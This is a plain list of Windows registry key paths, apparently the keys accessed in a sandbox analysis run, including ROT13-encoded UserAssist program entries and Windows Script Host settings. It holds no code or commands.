HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Clguba 3.8\Clguba 3.8 Zbqhyr Qbpf (32-ovg).yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\JvaENE\JvaENE.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{9R3995NO-1S9P-4S13-O827-48O24O6P7174}\GnfxOne\Sversbk.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{9R3995NO-1S9P-4S13-O827-48O24O6P7174}\GnfxOne\Tbbtyr Puebzr.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{9R3995NO-1S9P-4S13-O827-48O24O6P7174}\GnfxOne\Vagrearg Rkcybere.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{9R3995NO-1S9P-4S13-O827-48O24O6P7174}\GnfxOne\Zvpebfbsg Rqtr.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{9R3995NO-1S9P-4S13-O827-48O24O6P7174}\GnfxOne\Jvaqbjf Rkcybere.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{9R3995NO-1S9P-4S13-O827-48O24O6P7174}\GnfxOne\Jvaqbjf Zrqvn Cynlre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.VagreargRkcybere.Qrsnhyg
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{S38OS404-1Q43-42S2-9305-67QR0O28SP23}\rkcybere.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.ZrqvnCynlre32
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\ZFRqtr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Puebzr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\308046O0NS4N39PO
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\JvaqbjfCbjreFuryy\i1.0\cbjrefuryy.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.TrggvatFgnegrq
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\qvfcynlfjvgpu.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\pnyp.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.FgvpxlAbgrf
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\FavccvatGbby.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\JvaqbjfCbjreFuryy\i1.0\CbjreFuryy_VFR.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\zfcnvag.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\kcfepuij.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\JSF.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\pzq.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.ErzbgrQrfxgbc
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\zntavsl.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\freivprf.zfp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.JVAJBEQ.RKR.15
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\zfpbasvt.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\pyrnazte.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{ONOQ396S-678O-34OS-52P2-4PNQSSOO0700}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{15962175-7QSP-O1Q7-O0Q1-RO4P08SSQ754}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.RKPRY.RKR.15
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{3818ONN3-5SS0-P4O9-1NQO-POO62S590N99}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\efgehv.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\308046O0NS4N39PO;CevingrOebjfvatNHZVQ
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\P:\Hfref\hfre\NccQngn\Ybpny\Zvpebfbsg\BarQevir\BarQevir.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\abgrcnq.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\aneengbe.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\bfx.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\rhqprqvg.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\JvaENE\JvaENE.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.ZFNPPRFF.RKR.15
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\Nqbor\Npebong Ernqre QP\Ernqre\NpebEq32.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.ZrqvnPragre
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.BARABGR.RKR.15
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.BHGYBBX.RKR.15
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.CBJRECAG.RKR.15
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.ZFCHO.RKR.15
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{P0O8063P-2P2Q-P9S3-1QN6-R758P4PNN4QP}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.ylap.rkr.15
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\JvaqbjfNalgvzrHctenqrHV.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\QIQ Znxre\QIQZnxre.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\7-Mvc\7mSZ.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\Pbzzba Svyrf\Zvpebfbsg Funerq\Vax\zvc.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{OO348N20-771Q-3OR7-Q24R-8O5966Q59R06}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\ArgCebw.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\FbhaqErpbeqre.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\zboflap.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\Jvaqbjf AG\Npprffbevrf\jbeqcnq.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{QNN168QR-4306-P8OP-8P11-O596240OQQRQ}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\puneznc.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\qsethv.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{750393P8-PN7R-N272-947O-NRON67O060PS}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\zfvasb32.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\zvtjvm\cbfgzvt.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\zvtjvm\zvtjvm.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\Pbzzba Svyrf\Zvpebfbsg Funerq\Vax\FuncrPbyyrpgbe.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\Pbzzba Svyrf\Zvpebfbsg Funerq\Vax\GnoGvc.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\pbzrkc.zfp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{935761S8-94R4-SSN7-N8P0-S1NO2PQRP750}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\bqopnq32.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\vfpfvpcy.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\ZqFpurq.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{RQ4OQ59Q-OS0S-R631-89R9-2890450O9R8O}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\cevagznantrzrag.zfp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{7884N773-3177-5577-06RP-940R17N8S359}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\JS.zfp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\NhgbUbgxrl\NhgbUbgxrl.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\NhgbUbgxrl\Pbzcvyre\Nux2Rkr.rkr
DisableUserModeCallbackFilter
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings\IgnoreUserSettings
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\Enabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings\Enabled
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\LogSecuritySuccesses
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings\LogSecuritySuccesses
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\TrustPolicy
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\UseWINSAFER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings\TrustPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings\UseWINSAFER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings\Timeout
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings\DisplayLogo
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\Timeout
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\DisplayLogo
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.js\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\JSFile\ScriptEngine\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\JScript\CLSID\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\COM+Enabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000409
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\DA0C75D6
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\new\CLSID\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{50A7E9B0-70EF-11D1-B75A-00A0C90564FE}\1.0\0\win32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{04731B67-D933-450a-90E6-4ACD2E9408FE}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{11016101-E366-4D22-BC06-4ADA335C892B}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{138508bc-1e03-49ea-9c8f-ea9e1d05d65d}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{26EE0668-A00A-44D7-9371-BEB064C98683}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{450D8FBA-AD25-11D0-98A8-0800361B1103}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{59031a47-3f72-44a7-89c5-5595fe6b30ee}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{645FF040-5081-101B-9F08-00AA002F954E}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{89D83576-6BD1-4c86-9454-BEB04E94C819}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{9343812e-1c37-4a49-a12e-4b2d810d956b}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{98D99750-0B8A-4c59-9151-589053683D73}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{BD7A2E7B-21CB-41b2-A086-B309680C6B7E}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{daf95313-e44d-46af-be1b-cbacea2c3065}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e345f35f-9397-435c-8f95-4e922c26259e}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{ED228FDF-9EA8-4870-83b1-96b02CFE0D52}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsAliasedNotifications
